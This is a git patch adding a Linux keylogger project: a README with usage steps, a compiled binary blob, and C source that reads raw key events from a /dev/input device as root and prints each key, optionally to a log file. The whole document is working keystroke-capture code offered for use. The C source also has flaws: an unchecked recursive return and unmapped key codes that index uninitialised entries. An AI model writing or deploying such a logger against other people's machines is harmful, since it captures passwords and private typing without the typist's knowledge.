From 2bcf74b185a20e0872369207ee8315f62d88b548 Mon Sep 17 00:00:00 2001 From: Dim Kouv Date: Thu, 24 Nov 2016 18:14:44 -0500 Subject: [PATCH] Initial Commit --- README.md | 25 +++++++ bin/keylogger | Bin 0 -> 13072 bytes keylogger.c | 179 ++++++++++++++++++++++++++++++++++++++++++++++++++ 3 files changed, 204 insertions(+) create mode 100644 README.md create mode 100755 bin/keylogger create mode 100644 keylogger.c diff --git a/README.md b/README.md new file mode 100644 index 0000000..6c7c834 --- /dev/null +++ b/README.md @@ -0,0 +1,25 @@ +# Linux Keylogger + +# How to use +1. Find your keyboard device +Your keyboard device should be in the below format +``` +/dev/input/eventX +``` +Find it using +```sh +$ cat /var/log/Xorg.0.log | grep /dev/input | grep -i keyboard +``` + +2. Run keylogger +```sh +$ sudo bin/keylogger /dev/input/eventX +``` + + +3. Now whatever you type should be printed in the terminal. +If you want to keep in log file use +```sh +$ sudo bin/keylogger /dev/input/eventX > logfile.txt +``` + diff --git a/bin/keylogger b/bin/keylogger new file mode 100755 index 0000000000000000000000000000000000000000..9e2a26b0b47639dd5b994512bcb91bd674eb19fc GIT binary patch literal 13072 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 Bj5GiM literal 0 HcmV?d00001 diff --git a/keylogger.c b/keylogger.c new file mode 100644 index 0000000..0ba7775 --- /dev/null +++ b/keylogger.c @@ -0,0 +1,179 @@ +#include +#include +#include +#include +#include +#include +#include + +int get_key_press(int fd, struct input_event ev); +int input_has_errors(int argc, char *argv[]); +int user_is_root(); +char * get_key_description(int key_code); +void generate_mappings(char ** mappings); + + +/* + * returns 0 if user is not root + * else returns 1 + */ +int user_is_root() { + if (geteuid() != 0) { + puts("You should run this script as root"); + puts("ex: sudo ./keylogger /dev/input/deviceX"); + return 0; + } + return 1; +} + + +/* + * If no input device specified returns 1 + * If no errors it returns 0 + */ +int input_has_errors(int argc, char *argv[]) { + if(argc < 2) { + puts("No input device given."); + puts("Usage: './keylogger device'"); + puts("Device should be /dev/input/device*"); + puts("Find it using: `cat /var/log/Xorg.0.log | grep /dev/input | grep -i keyboard`"); + return 1; + } + return 0; +} + + +/* + * -Reads input event (key stroke) + * -Returns the key when it's released + * This means that by long pressing a key it only gets logged once. + * -If no key is pressed it calls itself recursively again + */ +int get_key_press(int fd, struct input_event ev) { + read(fd, &ev, sizeof(struct input_event)); + + // ev.value == 0 -> button is released + if (ev.type == 1 && ev.value == 0) + return ev.code; + + // if no key pressed check again + get_key_press(fd, ev); +} + + +int main(int argc, char *argv[]) { + // Convert key codes to string values + // ex: mappings[code] = "value" + char * mappings[1024]; + generate_mappings(mappings); + + + // Check for errors + if (input_has_errors(argc, argv)) { + return -1; + } + if (!user_is_root()) { + return -1; + } + + // Start keyboard device as read only + int fd; + fd = open(argv[1], O_RDONLY); + + // Initialize input event + struct input_event ev; + + // Scan for key strokes and print them + while (1){ + int key_code = get_key_press(fd, ev); // get key code + printf("%s\n",mappings[key_code]); // print value of key code + } + + return 0; +} + + +/* + * Generates a value for each key stroke code + */ +void generate_mappings(char ** codes) { + codes[1] = "esc"; + codes[59] = "f1"; + codes[60] = "f2"; + codes[61] = "f3"; + codes[62] = "f4"; + codes[63] = "f5"; + codes[64] = "f6"; + codes[65] = "f7"; + codes[66] = "f8"; + codes[67] = "f9"; + codes[68] = "f10"; + codes[87] = "f11"; + codes[88] = "f12"; + // -- + codes[41] = "`"; + codes[2] = "1"; + codes[3] = "2"; + codes[4] = "3"; + codes[5] = "4"; + codes[6] = "5"; + codes[7] = "6"; + codes[8] = "7"; + codes[9] = "8"; + codes[10] = "9"; + codes[11] = "0"; + codes[12] = "-"; + codes[13] = "="; + codes[14] = "back"; + // -- + codes[15] = "tab"; + codes[16] = "q"; + codes[17] = "w"; + codes[18] = "e"; + codes[19] = "r"; + codes[20] = "t"; + codes[21] = "y"; + codes[22] = "u"; + codes[23] = "i"; + codes[24] = "o"; + codes[25] = "p"; + codes[26] = "["; + codes[27] = "]"; + codes[43] = "\\"; + // -- + codes[58] = "caps"; + codes[30] = "a"; + codes[31] = "s"; + codes[32] = "d"; + codes[33] = "f"; + codes[34] = "g"; + codes[35] = "h"; + codes[36] = "j"; + codes[37] = "k"; + codes[38] = "l"; + codes[39] = ";"; + codes[40] = "\""; + codes[28] = "\n"; + // -- + codes[42] = "shift"; + codes[44] = "z"; + codes[45] = "x"; + codes[46] = "c"; + codes[47] = "v"; + codes[48] = "b"; + codes[49] = "n"; + codes[50] = "m"; + codes[51] = ","; + codes[52] = "."; + codes[53] = "/"; + codes[54] = "shift"; + // -- + codes[29] = "ctrl"; + codes[125] = "super"; + codes[56] = "alt"; + codes[57] = " "; + codes[100] = "alt"; + codes[126] = "super"; + codes[127] = "right click"; + codes[97] = "ctrl"; +}